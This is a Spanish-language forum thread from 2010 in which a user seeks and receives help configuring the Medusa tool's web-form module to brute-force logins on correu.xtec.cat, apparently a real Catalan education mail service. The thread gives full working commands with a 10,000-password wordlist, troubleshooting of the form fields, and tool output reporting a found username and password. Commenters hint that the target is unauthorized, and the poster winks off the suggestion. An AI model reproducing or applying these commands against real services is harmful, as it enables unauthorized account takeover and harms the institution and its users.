Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Hacking => Mensaje iniciado por: kimpa2007 en 28 Abril 2010, 23:25 PM

Título: MEDUSA WEB-FORM
Publicado por: kimpa2007 en 28 Abril 2010, 23:25 PM
Buenasss

mirad estoy haciendo pruebas con el medusa pero tengo un problema.
segun tengo entendido el problema esta en form-data pero no acabo de entender como funciona..

La orden que uso es la siguiente:

medusa -u usuario -P /rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"post?user=&pass" -m DENY-SIGNAL:"incorrect" -h correu.xtec.cat

Si alguien puede ayudarme ;P
Título: Re: MEDUSA WEB-FORM
Publicado por: toxeek en 29 Abril 2010, 15:14 PM

Que tal.

Podrias poner que error te suelta?? Siempre dad la maxima info posible (errores...etc.) cuando pidais ayuda para un error como este.

Que version de Medusa usas ?


SaluDoS.
Título: Re: MEDUSA WEB-FORM
Publicado por: kimpa2007 en 29 Abril 2010, 17:04 PM
pos mira cuando ejecuto la orden solo hace la primera palabra de la wordlist:

GENERAL: Module parameter: FORM:iwc_static/layout/login.html
GENERAL: Module parameter: FORM-DATA:post?user=&pass
GENERAL: Module parameter: DENY-SIGNAL:incorrect
GENERAL: Parallel Hosts: 1 Parallel Logins: 1
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 10000

ACCOUNT CHECK: [web-form] Host: correu.xtec.cat (1 of 1, 0 complete) User: rstein2 (1 of 1, 0 complete) Password: rs0001 (1 of 10000 complete)
ACCOUNT FOUND: [web-form] Host: correu.xtec.cat User: rstein2 Password: rs0001 [SUCCESS]

INFO: Login Module: 0 - Current user password list is complete, selecting next user.
INFO: Login Module: 0 - Current user password list is complete, rescanning userlist for unfinished credentials.
INFO: Login Module: 0 - Current user password list is complete, selecting next user.
INFO: Login Module: 0 - No more user accounts available for testing.
INFO: Login Module: 0 - No more users/passwords available in the normal queue.
INFO: Login Module: 0 - No additional missed users/passwords, setting credential status to CREDENTIAL_DONE.
GENERAL: Medusa has finished.
Título: Re: MEDUSA WEB-FORM
Publicado por: kimpa2007 en 29 Abril 2010, 17:05 PM
aa y la versión que uso es la v2.0
Título: Re: MEDUSA WEB-FORM
Publicado por: toxeek en 29 Abril 2010, 18:52 PM

Que tal.


Citarmedusa -u usuario -P /rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"post?user=&pass" -m DENY-SIGNAL:"incorrect" -h correu.xtec.cat

Primero, prueba a poner un "=" (sin comillas) tras pass. O sea, que quede &pass=

Ademas, mira en el source del (x)HTML como el form esta elaborado. Si hay algun value para inputs tipo hidden a*adelos, y si Submit tiene un value (por ejemplo submit) pondlo en la cadena para -m FORM tambien.


Bueno prueba y ve diciendo  ;)


Saludos.

Título: Re: MEDUSA WEB-FORM
Publicado por: toxeek en 29 Abril 2010, 19:18 PM

Citariwc_static/layout/login.html
??

No sera un .php ???
Mira a ver hacia donde apunta el METHOD del form .. y asegurate que va sobre POST!


Saludos.
Título: Re: MEDUSA WEB-FORM
Publicado por: kimpa2007 en 30 Abril 2010, 19:27 PM
Ei ya he encontrado mi problema!!
Usando el HTTP live headers he podido ver que me habia equivocado en el form-data.
La orden que tengo que usar es esa:

medusa -u user -P /diccionaris/rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"fromlogin=true&username=&pass=" -m DENY-SIGNAL:"El" -h correu.xtec.cat -F

gracias por la ayuda ;P
Título: Re: MEDUSA WEB-FORM
Publicado por: Debci en 30 Abril 2010, 23:40 PM
Hay.... que li vols fer a l´xtec?

Salutacions...
Título: Re: MEDUSA WEB-FORM
Publicado por: dazoverride en 1 Mayo 2010, 19:43 PM
XD xtec? jajajajaja

això em sona :P no seas malooo !!
Título: Re: MEDUSA WEB-FORM
Publicado por: kimpa2007 en 2 Mayo 2010, 18:51 PM
jajaja yo acer algo malo a la xtec?
nunca de la vida ;)
Sólo texto | Texto con Imágenes